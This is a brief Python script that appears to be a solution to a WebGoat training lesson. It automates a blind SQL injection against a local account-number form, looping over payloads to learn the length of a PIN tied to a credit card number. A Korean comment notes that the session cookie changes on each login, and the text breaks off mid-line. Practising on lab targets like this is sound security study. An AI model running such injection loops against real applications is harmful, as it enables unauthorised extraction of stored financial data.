import requests url='http://localhost:8080/WebGoat/attack?Screen=1315528047&menu=1100' cookie={'JSESSIONID' : '2C39E081510CA8F799595014F02D79A7'} #접속할 때마다 달라짐. words="101 and length(select name from pins where cc_number='4321432143214321') >" for i in range(0, 10): data= {'account_number': words + str(i), 'SUMBIT':'GO!'} res=requests.post(url, data=data, cookies=cookie) if 'Account number is val..